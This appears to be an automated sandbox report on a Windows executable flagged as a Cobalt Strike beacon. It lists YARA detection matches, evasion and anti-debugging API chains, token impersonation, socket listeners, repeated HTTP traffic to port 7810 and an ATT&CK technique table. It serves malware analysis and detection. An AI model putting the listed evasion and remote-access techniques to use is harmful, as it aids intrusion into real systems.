            Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
            Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
            Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
            Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
            Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
            Source: Process Memory Space: P3KxDOMmD3.exe PID: 5480, type: MEMORYSTRMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
            Source: Process Memory Space: P3KxDOMmD3.exe PID: 5480, type: MEMORYSTRMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
            Source: Process Memory Space: P3KxDOMmD3.exe PID: 5480, type: MEMORYSTRMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_00670B70 LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,0_2_00670B70
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_00673A64 CreateThread,GetModuleHandleA,GetProcAddress,CreateToolhelp32Snapshot,Thread32Next,Sleep,0_2_00673A64
            Source: P3KxDOMmD3.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: P3KxDOMmD3.exeReversingLabs: Detection: 86%
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior

            Data Obfuscation

            barindex
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeUnpacked PE file: 0.2.P3KxDOMmD3.exe.660000.2.unpack
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_0066D83C GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_0066D83C
            Source: P3KxDOMmD3.exeStatic PE information: section name: .xdata
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_001D776C push 0000006Ah; retf 0_2_001D7784
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_0069916C push 0000006Ah; retf 0_2_00699184

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50064 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50065 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50076 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50082 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50086 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50087 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50088 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50091 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50097 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50098 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50099 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50100 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50101 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50103 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50104 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50105 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50107 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50110 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50111 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50112 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50113 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50115 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50117 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50119 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50120 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50121 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50122 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50123 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50124 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50125 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50126 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50127 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50130 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50131 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50132 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50133 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50134 -> 7810
            Source: unknownNetwork traffic detected: HTTP traffic on port 50135 -> 7810
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_006801A8 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_006801A8

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_006758540_2_00675854
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_0066FA1C0_2_0066FA1C
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeWindow / User API: threadDelayed 9501Jump to behavior
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-37562
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-37704
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeAPI coverage: 6.5 %
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_0066FA1C0_2_0066FA1C
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exe TID: 6568Thread sleep count: 9501 > 30Jump to behavior
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exe TID: 6568Thread sleep time: -95010000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exe TID: 6496Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exe TID: 6568Thread sleep count: 343 > 30Jump to behavior
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exe TID: 6568Thread sleep time: -3430000s >= -30000sJump to behavior
            Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_00679220 malloc,_snprintf,FindFirstFileA,free,malloc,_snprintf,free,FindNextFileA,FindClose,0_2_00679220
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_00671C30 malloc,GetCurrentDirectoryA,FindFirstFileA,GetLastError,free,free,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,0_2_00671C30
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeThread delayed: delay time: 60000Jump to behavior
            Source: P3KxDOMmD3.exe, 00000000.00000003.2603494375.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.3720845976.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.3778925303.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1804978750.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1944131146.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.2876116472.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1856658291.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1926499944.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.1786743074.000000000076F000.00000004.00000020.00020000.00000000.sdmp, P3KxDOMmD3.exe, 00000000.00000003.2638951717.000000000076F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeAPI call chain: ExitProcess graph end nodegraph_0-37635

            Anti Debugging

            barindex
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleepgraph_0-37303
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeProcess Stats: CPU usage > 42% for more than 60s
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_0068F810 MultiByteToWideChar,MultiByteToWideChar,DebuggerProbe,DebuggerRuntime,IsDebuggerPresent,_RTC_GetSrcLine,WideCharToMultiByte,WideCharToMultiByte,0_2_0068F810
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_00689744 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00689744
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_0066D83C GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_0066D83C
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_0068C0C8 _lseeki64_nolock,_lseeki64_nolock,GetProcessHeap,HeapAlloc,_errno,_errno,_setmode_nolock,__doserrno,_errno,_setmode_nolock,GetProcessHeap,HeapFree,_lseeki64_nolock,SetEndOfFile,_errno,__doserrno,GetLastError,_lseeki64_nolock,0_2_0068C0C8
            Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_00401180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,GetStartupInfoA,0_2_00401180
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_00401A70 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,0_2_00401A70
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_004542E4 SetUnhandledExceptionFilter,0_2_004542E4
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_00402F62 SetUnhandledExceptionFilter,0_2_00402F62
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_006924F0 SetUnhandledExceptionFilter,0_2_006924F0
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_006844D0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,UnhandledExceptionFilter,0_2_006844D0

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: Yara matchFile source: Process Memory Space: P3KxDOMmD3.exe PID: 5480, type: MEMORYSTR
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_0067DF50 LogonUserA,GetLastError,ImpersonateLoggedOnUser,GetLastError,0_2_0067DF50
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_00692050 AllocateAndInitializeSid,0_2_00692050
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_00401630 CreateNamedPipeA,ConnectNamedPipe,WriteFile,CloseHandle,0_2_00401630
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_00401990 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00401990
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_00675E28 GetUserNameA,GetComputerNameA,GetModuleFileNameA,strrchr,GetVersionExA,GetProcAddress,GetModuleHandleA,GetProcAddress,_snprintf,0_2_00675E28
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_00675E28 GetUserNameA,GetComputerNameA,GetModuleFileNameA,strrchr,GetVersionExA,GetProcAddress,GetModuleHandleA,GetProcAddress,_snprintf,0_2_00675E28
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: Process Memory Space: P3KxDOMmD3.exe PID: 5480, type: MEMORYSTR
            Source: Yara matchFile source: 0.2.P3KxDOMmD3.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0.2.P3KxDOMmD3.exe.1a0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.P3KxDOMmD3.exe.660000.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.P3KxDOMmD3.exe.660000.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_00676A78 socket,htons,ioctlsocket,closesocket,bind,listen,0_2_00676A78
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_00676670 htonl,htons,socket,closesocket,bind,ioctlsocket,0_2_00676670
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_00692630 bind,0_2_00692630
            Source: C:\Users\user\Desktop\P3KxDOMmD3.exeCode function: 0_2_0067EE8C socket,closesocket,htons,bind,listen,0_2_0067EE8C
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts
            2
            Native API
            2
            Valid Accounts
            2
            Valid Accounts
            2
            Valid Accounts
            OS Credential Dumping1
            System Time Discovery
            Remote Services1
            Archive Collected Data
            2
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            DLL Side-Loading
            21
            Access Token Manipulation
            212
            Virtualization/Sandbox Evasion
            LSASS Memory341
            Security Software Discovery
            Remote Desktop ProtocolData from Removable Media11
            Non-Standard Port
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            Process Injection
            21
            Access Token Manipulation
            Security Account Manager212
            Virtualization/Sandbox Evasion
            SMB/Windows Admin SharesData from Network Shared Drive2
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            DLL Side-Loading
            1
            Process Injection
            NTDS1
            Process Discovery
            Distributed Component Object ModelInput Capture1
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
            Obfuscated Files or Information
            LSA Secrets1
            Application Window Discovery
            SSHKeylogging111
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Software Packing
            Cached Domain Credentials1
            Account Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading
            DCSync1
